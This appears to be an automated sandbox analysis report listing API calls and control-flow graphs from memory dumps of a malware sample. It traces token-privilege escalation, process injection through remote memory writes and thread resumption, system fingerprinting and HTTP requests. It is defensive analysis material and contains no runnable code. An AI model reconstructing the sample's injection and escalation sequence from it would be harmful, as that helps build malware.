                    • Part of subcall function 0017ADB0: ??3@YAXPAX@Z.MSVCRT ref: 0017AF9A
                    • Part of subcall function 001814C0: WSAStartup.WS2_32(00000202,?), ref: 001814E2
                    • Part of subcall function 001814C0: gethostname.WS2_32(?,000000FF), ref: 00181502
                    • Part of subcall function 001814C0: getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 00181522
                    • Part of subcall function 001814C0: freeaddrinfo.WS2_32(00000000), ref: 00181580
                    • Part of subcall function 001814C0: WSACleanup.WS2_32 ref: 00181586
                    • Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F
                  • _time64.MSVCRT ref: 00180338
                    • Part of subcall function 001737C0: memcpy.MSVCRT ref: 00173CA0
                    • Part of subcall function 00172030: ??2@YAPAXI@Z.MSVCRT ref: 0017207A
                    • Part of subcall function 00172030: ??3@YAXPAX@Z.MSVCRT ref: 00172176
                    • Part of subcall function 00172030: _time64.MSVCRT ref: 001721A8
                    • Part of subcall function 00172030: ??3@YAXPAX@Z.MSVCRT ref: 001721CF
                    • Part of subcall function 00179AB0: WSAStartup.WS2_32(00000202,?), ref: 00179ADA
                    • Part of subcall function 00179AB0: freeaddrinfo.WS2_32(00000000,0018043A), ref: 00179B3B
                    • Part of subcall function 00179AB0: getaddrinfo.WS2_32(0018043A,00000000,?,00000000), ref: 00179BD6
                    • Part of subcall function 00179AB0: freeaddrinfo.WS2_32(00000000), ref: 00179C1E
                    • Part of subcall function 00179AB0: WSACleanup.WS2_32 ref: 00179C44
                    • Part of subcall function 00182AD0: ??2@YAPAXI@Z.MSVCRT ref: 00182ADD
                    • Part of subcall function 00182AD0: ??3@YAXPAX@Z.MSVCRT ref: 00182B54
                    • Part of subcall function 00182AD0: _time64.MSVCRT ref: 00182B82
                    • Part of subcall function 00182AD0: ??3@YAXPAX@Z.MSVCRT ref: 00182BAA
                    • Part of subcall function 0017EAC0: CoCreateInstance.OLE32(0018708C,00000000,00000001,00186E7C,00000004,00188880,000003E7,0017FF87), ref: 0017EB17
                    • Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182C56
                    • Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182C90
                    • Part of subcall function 00182BC0: ??2@YAPAXI@Z.MSVCRT ref: 00182CDB
                    • Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D75
                    • Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D8A
                    • Part of subcall function 00182BC0: ??3@YAXPAX@Z.MSVCRT ref: 00182D9E
                  • ExitProcess.KERNEL32 ref: 00180706
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 001735E0: CreateMutexW.KERNELBASE(?,00000001,?), ref: 0017366B
                    • Part of subcall function 001735E0: ExitProcess.KERNEL32 ref: 0017368E
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 238 17c430-17c48a 240 17c490-17c4ba call 176d80 238->240 241 17c55f-17c582 238->241 249 17c556-17c55e 240->249 250 17c4c0-17c554 call 176d80 GetProcAddress call 176d80 GetProcAddress call 176d80 GetProcAddress call 176d80 GetProcAddress 240->250 247 17c5cf-17c5d9 241->247 248 17c584-17c59e 241->248 252 17c625-17c62c 247->252 253 17c5db-17c5e6 247->253 248->247 258 17c5a0-17c5cd AdjustTokenPrivileges 248->258 250->241 250->249 256 17c632-17c639 252->256 257 17c821 252->257 259 17c5e9-17c5eb 253->259 256->257 267 17c63f-17c65a 256->267 260 17c824-17c829 257->260 258->247 259->252 265 17c5ed-17c5f7 259->265 263 17c82b-17c83a 260->263 264 17c83d-17c842 260->264 263->264 271 17c844-17c84b 264->271 272 17c853-17c858 264->272 269 17c614-17c61b 265->269 270 17c5f9-17c5fc 265->270 267->257 292 17c660-17c681 267->292 273 17c620-17c623 269->273 274 17c61d 269->274 278 17c600-17c602 270->278 271->272 275 17c85a-17c866 272->275 276 17c869-17c86b 272->276 273->252 273->267 274->273 275->276 279 17c86d-17c873 call 17bc60 276->279 280 17c876-17c87b 276->280 283 17c604-17c60a 278->283 284 17c60e-17c611 278->284 279->280 287 17c87d-17c8a4 AdjustTokenPrivileges 280->287 288 17c8a7-17c8b0 280->288 283->278 285 17c60c 283->285 284->269 285->269 287->288 292->257 294 17c687-17c6b9 GetTokenInformation 292->294 296 17c6bb-17c6c4 GetLastError 294->296 297 17c6e1-17c700 GetTokenInformation 294->297 296->260 298 17c6ca-17c6db call 181f60 296->298 297->260 299 17c706-17c745 297->299 298->260 298->297 299->260 303 17c74b-17c78d 299->303 303->260 305 17c793-17c7d4 call 1791c0 303->305 305->260 309 17c7d6-17c806 CreateProcessAsUserW 305->309 309->260 310 17c808-17c81f 309->310 310->260
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0017C4E2
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0017C505
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0017C528
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0017C54B
                  • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,?,?), ref: 0017C5CD
                  • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,80000000), ref: 0017C6B5
                  • GetLastError.KERNEL32 ref: 0017C6BB
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • GetTokenInformation.KERNELBASE(?,00000001,00000000,80000000,80000000), ref: 0017C6FC
                  • CreateProcessAsUserW.KERNEL32(?,00000000,08000424,00000000,00000000,00000000,FFFFFFFF,08000424,00000000,00000044,?), ref: 0017C802
                  • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0017C893
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 692 415d50-415dc5 call 4158c5 695 415e06-415e2b GetCurrentProcess call 4158c5 692->695 696 415dc7-415dd1 692->696 704 415e37-415e62 call 4158c5 695->704 705 415e2d 695->705 698 415ddf-415dfa call 4158c5 696->698 699 415dd3 696->699 698->695 706 415dfc 698->706 700 4163c0-4163c5 699->700 709 415e6b-415e75 704->709 705->700 706->700 710 415e7b-415e95 709->710 711 415f4a-415f56 709->711 712 415ea9-415eb6 710->712 713 415e97-415ea7 710->713 714 41608a-4160a8 call 4158c5 711->714 715 415f5c-415f7a call 4158c5 711->715 716 415eb9-415eec call 4158c5 712->716 713->716 724 4161de-4161f5 714->724 725 4160ae-4160b4 714->725 715->714 723 415f80-415f86 715->723 727 415ef8-415f18 call 4158c5 716->727 728 415eee 716->728 723->714 726 415f8c-415fb0 723->726 737 41630b 724->737 738 4161fb-41620d 724->738 729 4160e6-416101 725->729 730 4160b6-4160bd 725->730 734 415fb3-415fbf 726->734 753 415f45 727->753 754 415f1a-415f42 call 4158c5 727->754 728->700 732 416103 729->732 733 416105-416125 call 4158c5 LoadLibraryA 729->733 730->729 736 4160bf-4160c6 730->736 732->725 771 416131-41614e call 4158c5 733->771 772 416127 733->772 739 416079-416085 734->739 740 415fc5-415fd1 734->740 736->729 742 4160c8-4160cf 736->742 741 416312-416328 call 4158c5 737->741 744 41620f-416221 738->744 745 41626f-416281 738->745 739->723 747 415fd3-41600e call 4158c5 740->747 748 416010-41601c 740->748 776 41632a 741->776 777 416334-41633b 741->777 742->729 749 4160d1-4160d7 742->749 755 416249-41625b 744->755 756 416223-416235 744->756 751 416283-416295 745->751 752 4162a9-4162bb 745->752 767 41606c-416074 747->767 748->767 768 41601e-416069 call 4158c5 748->768 749->729 760 4160d9-4160e0 749->760 758 416297-41629e 751->758 759 4162a0 751->759 773 4162c6 752->773 774 4162bd-4162c4 752->774 753->709 754->753 762 41625d-416264 755->762 763 416266 755->763 765 416237-41623e 756->765 766 416240 756->766 780 4162a7 758->780 759->780 760->724 760->729 781 41626d 762->781 763->781 779 416247 765->779 766->779 767->734 768->767 792 416151-416157 771->792 772->700 784 4162cd-4162fa call 4158c5 773->784 774->784 776->700 785 41633d-416350 NtQueryInformationProcess 777->785 786 416353-41635a 777->786 779->781 780->784 781->784 793 416306 784->793 794 4162fc 784->794 785->786 786->741 790 41635c-416360 786->790 797 416362 790->797 798 416366-4163b6 call 4158c5 call 17d796 790->798 795 416159-416163 792->795 796 4161d0-4161d9 792->796 793->737 794->700 799 41617e-4161a1 call 4158c5 GetProcAddress 795->799 800 416165-41617c GetProcAddress 795->800 796->725 797->700 808 4163b9 798->808 803 4161a4-4161a8 799->803 800->803 805 4161b4-4161ce 803->805 806 4161aa 803->806 805->792 806->700 808->700
                  APIs
                  • GetCurrentProcess.KERNEL32(?,00000040), ref: 00415E06
                  • LoadLibraryA.KERNEL32(00000000), ref: 00416118
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,00000004,?,00000040), ref: 00416173
                  • GetProcAddress.KERNEL32(00000000,00000002,00000000,00000000,?,?,?,?,?,00000004,?,00000040), ref: 0041619B
                  • NtQueryInformationProcess.NTDLL(?,00000000,00000000,00000018,00000000), ref: 0041634A
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10778449992.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_400000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1196 172530-172561 1198 172567-172581 1196->1198 1199 1726f9-172711 call 17bc60 1196->1199 1203 172587-17258a 1198->1203 1204 172597-172599 1203->1204 1205 17258c-172590 1203->1205 1204->1199 1206 17259f-1725be call 181e20 1204->1206 1205->1203 1207 172592 1205->1207 1206->1199 1210 1725c4-1725e3 FindFirstFileW 1206->1210 1207->1199 1210->1199 1211 1725e9-1725eb 1210->1211 1212 1725f3-1725fa 1211->1212 1213 1726a0-1726b7 FindNextFileW 1212->1213 1214 172600-172616 call 181f60 1212->1214 1213->1212 1216 1726bd-1726c6 GetLastError 1213->1216 1217 1726cf-1726e1 1214->1217 1220 17261c-172631 call 181f60 1214->1220 1216->1217 1218 1726c8 1216->1218 1223 1726e3-1726e5 1217->1223 1224 172712-17271f 1217->1224 1218->1217 1220->1217 1227 172637-17266e call 1791c0 call 180e20 1220->1227 1223->1199 1226 1726e7-1726f7 call 17bc60 1223->1226 1226->1199 1227->1213 1234 172670-172687 call 17bc60 1227->1234 1237 172696-17269e call 17bc60 1234->1237 1238 172689-172694 call 181f60 1234->1238 1237->1213 1238->1213
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,00000105,*.*), ref: 001725DB
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                    • Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52
                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 001726B3
                  • GetLastError.KERNEL32 ref: 001726BD
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • GetAdaptersInfo.IPHLPAPI(00000000,00000288,?,00000000,?,00180130,00000000), ref: 00180EE5
                    • Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • memcpy.MSVCRT ref: 001777B9
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • NtQueryInformationProcess.NTDLL(00003000,00000000,0017CB21,00000018,00000000,0017CB21,001800C1,00000000), ref: 001767E8
                    • Part of subcall function 00176DA0: ReadProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE54,?,?,?,00000070,00000000), ref: 00176DC9
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000BC7B), ref: 00179645
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 311 17e230-17e245 312 17e251-17e2ee memset 311->312 313 17e247-17e24e 311->313 319 17e652-17e698 312->319 320 17e2f4-17e326 312->320 327 17e6c8-17e6cc 319->327 328 17e69a-17e6c5 319->328 320->319 325 17e32c-17e35e 320->325 325->319 339 17e364-17e37f call 17ecf0 call 182050 325->339 330 17e6f9-17e700 327->330 331 17e6ce-17e6f6 327->331 328->327 332 17e702-17e72a 330->332 333 17e72d-17e72f 330->333 331->330 332->333 337 17e750-17e755 333->337 338 17e731-17e74d call 17ecf0 333->338 342 17e757-17e767 337->342 343 17e76a-17e790 337->343 338->337 339->319 349 17e385-17e39b call 17ecf0 call 177b30 339->349 342->343 349->319 354 17e3a1-17e516 call 1791c0 call 176d80 GetProcAddress call 176d80 GetProcAddress call 176d80 GetProcAddress call 176d80 GetProcAddress call 176d80 GetProcAddress call 176d80 GetProcAddress call 176d80 GetProcAddress call 176d80 GetProcAddress 349->354 354->319 374 17e51c-17e520 354->374 374->319 375 17e526-17e52a 374->375 375->319 376 17e530-17e534 375->376 376->319 377 17e53a-17e552 call 182050 376->377 377->319 380 17e558-17e56c call 177b30 377->380 380->319 383 17e572-17e57c call 1767c0 380->383 383->319 386 17e582-17e586 383->386 387 17e588-17e5ae call 177b30 386->387 388 17e5b5-17e5ce 386->388 391 17e5b3 387->391 392 17e5d1-17e5d3 388->392 391->392 392->319 393 17e5d5-17e613 ResumeThread 392->393 393->319 396 17e615-17e61e call 17e9a0 393->396 396->319 399 17e620-17e64f 396->399
                  APIs
                  • memset.MSVCRT ref: 0017E25C
                    • Part of subcall function 00177B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE7B,?,?,?,00000070,?,?,?), ref: 00177B5C
                  • GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E3F1
                  • GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E419
                  • GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E441
                  • GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E469
                  • GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E491
                  • GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E4B9
                  • GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E4E1
                  • GetProcAddress.KERNEL32(0017CB21,?), ref: 0017E509
                    • Part of subcall function 001767C0: NtQueryInformationProcess.NTDLL(00003000,00000000,0017CB21,00000018,00000000,0017CB21,001800C1,00000000), ref: 001767E8
                  • ResumeThread.KERNELBASE(?), ref: 0017E60F
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  APIs
                  • LoadLibraryW.KERNEL32(?), ref: 0017EDF2
                  • LoadLibraryW.KERNEL32(?), ref: 0017EE19
                  • GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE47
                  • GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE6F
                  • GetProcAddress.KERNEL32(74E50000,?), ref: 0017EE97
                  • GetProcAddress.KERNEL32(74E50000,?), ref: 0017EEBF
                  • GetProcAddress.KERNEL32(74E30000,?), ref: 0017EEE7
                  • GetProcAddress.KERNEL32(74E30000,?), ref: 0017EF0F
                  • GetProcAddress.KERNEL32(74E30000,?), ref: 0017EF37
                  • GetProcAddress.KERNEL32(74E30000,?), ref: 0017EF5B
                  • GetProcAddress.KERNEL32(74E30000,?), ref: 0017EF7F
                  • GetProcAddress.KERNEL32(74E30000,?), ref: 0017EFA3
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 446 173e30-173e34 447 173e3b 446->447 448 173e36 446->448 449 176260-1762f6 447->449 448->449 451 17662e-176633 449->451 452 1762fc-17630f 449->452 453 17663d-176642 451->453 454 176635-176638 451->454 452->451 458 176315-176335 call 178030 call 1733a0 452->458 456 17664c-176651 453->456 457 176644-176649 453->457 454->453 459 17665c-176665 456->459 460 176653-176659 call 17bc60 456->460 457->456 467 176337-176342 call 1827b0 458->467 468 176347-176357 call 175c50 458->468 460->459 467->451 468->451 473 17635d-1763f1 call 1791c0 * 2 VariantInit * 2 call 1824c0 call 1713a0 468->473 482 1763fa 473->482 483 1763f3-1763f8 473->483 484 176401-176414 call 1713a0 482->484 483->484 487 17641d 484->487 488 176416-17641b 484->488 489 176424-1764bc call 177cf0 * 2 VariantClear * 3 487->489 488->489 495 1764c2-1764c8 489->495 496 176622 call 176e00 489->496 495->451 498 1764ce-1764de call 175c50 495->498 500 176627-176629 496->500 498->451 503 1764e4-17655f call 1791c0 VariantInit * 3 call 1713a0 498->503 500->451 502 17662b 500->502 502->451 508 176568 503->508 509 176561-176566 503->509 510 17656f-176582 call 1713a0 508->510 509->510 513 176584-176589 510->513 514 17658b 510->514 515 176592-176620 call 177cf0 * 2 VariantClear * 3 513->515 514->515 515->451
                  APIs
                    • Part of subcall function 00175C50: LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 00175CDB
                    • Part of subcall function 00175C50: memcpy.MSVCRT ref: 00175D81
                    • Part of subcall function 00175C50: memcpy.MSVCRT ref: 00175DA6
                    • Part of subcall function 00175C50: _time64.MSVCRT ref: 00175E4C
                    • Part of subcall function 00175C50: _localtime64.MSVCRT ref: 00175E5D
                    • Part of subcall function 00175C50: wcsftime.MSVCRT ref: 00175E87
                  • VariantInit.OLEAUT32(?), ref: 00176386
                  • VariantInit.OLEAUT32(?), ref: 0017639E
                    • Part of subcall function 001824C0: SysAllocString.OLEAUT32(001763CA), ref: 001824D3
                    • Part of subcall function 001713A0: ??2@YAPAXI@Z.MSVCRT ref: 001713A9
                    • Part of subcall function 001713A0: SysAllocString.OLEAUT32(75CF3F3F), ref: 001713CA
                    • Part of subcall function 00177CF0: InterlockedDecrement.KERNEL32(?), ref: 00177CFE
                    • Part of subcall function 00177CF0: SysFreeString.OLEAUT32(00000000), ref: 00177D13
                    • Part of subcall function 00177CF0: ??_V@YAXPAX@Z.MSVCRT ref: 00177D21
                    • Part of subcall function 00177CF0: ??3@YAXPAX@Z.MSVCRT ref: 00177D2A
                  • VariantClear.OLEAUT32(?), ref: 001764AC
                  • VariantClear.OLEAUT32(?), ref: 001764B2
                  • VariantClear.OLEAUT32(?), ref: 001764B8
                  • VariantInit.OLEAUT32(?), ref: 001764F9
                  • VariantInit.OLEAUT32(?), ref: 00176517
                  • VariantInit.OLEAUT32(?), ref: 00176538
                  • VariantClear.OLEAUT32(?), ref: 0017660F
                  • VariantClear.OLEAUT32(?), ref: 00176618
                  • VariantClear.OLEAUT32(?), ref: 0017661E
                    • Part of subcall function 00176E00: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00176E5D
                    • Part of subcall function 001827B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000001,?,?,80000001,?,00176342,?,?,?,?,0017FF94), ref: 0018282F
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 001733A0: VariantClear.OLEAUT32(?), ref: 00173432
                    • Part of subcall function 001733A0: SysFreeString.OLEAUT32(0017632B), ref: 0017345C
                    • Part of subcall function 001733A0: SysFreeString.OLEAUT32(?), ref: 001734D6
                    • Part of subcall function 001733A0: VariantClear.OLEAUT32(?), ref: 00173575
                    • Part of subcall function 001733A0: SysFreeString.OLEAUT32(?), ref: 0017359B
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 521 178820-178840 call 17f420 524 1788f8-1788fd 521->524 525 178846-17884b 521->525 526 178906-178915 524->526 527 1788ff 524->527 528 17884d-178854 525->528 529 178857-1788b1 WinHttpSetTimeouts call 1791c0 WinHttpOpenRequest 525->529 527->526 528->529 529->524 533 1788b3-1788b6 529->533 534 1788d2-1788e4 WinHttpSendRequest 533->534 535 1788b8-1788d0 WinHttpSetOption 533->535 536 1788e6-1788f1 534->536 537 178918-178925 WinHttpReceiveResponse 534->537 535->524 535->534 536->524 537->524 538 178927-178942 WinHttpQueryHeaders 537->538 538->524 539 178944-178956 538->539
                  APIs
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 0017884E
                  • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,0002BF20,000927C0,00000000,00000000), ref: 0017886F
                  • WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 001788A6
                  • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 001788C8
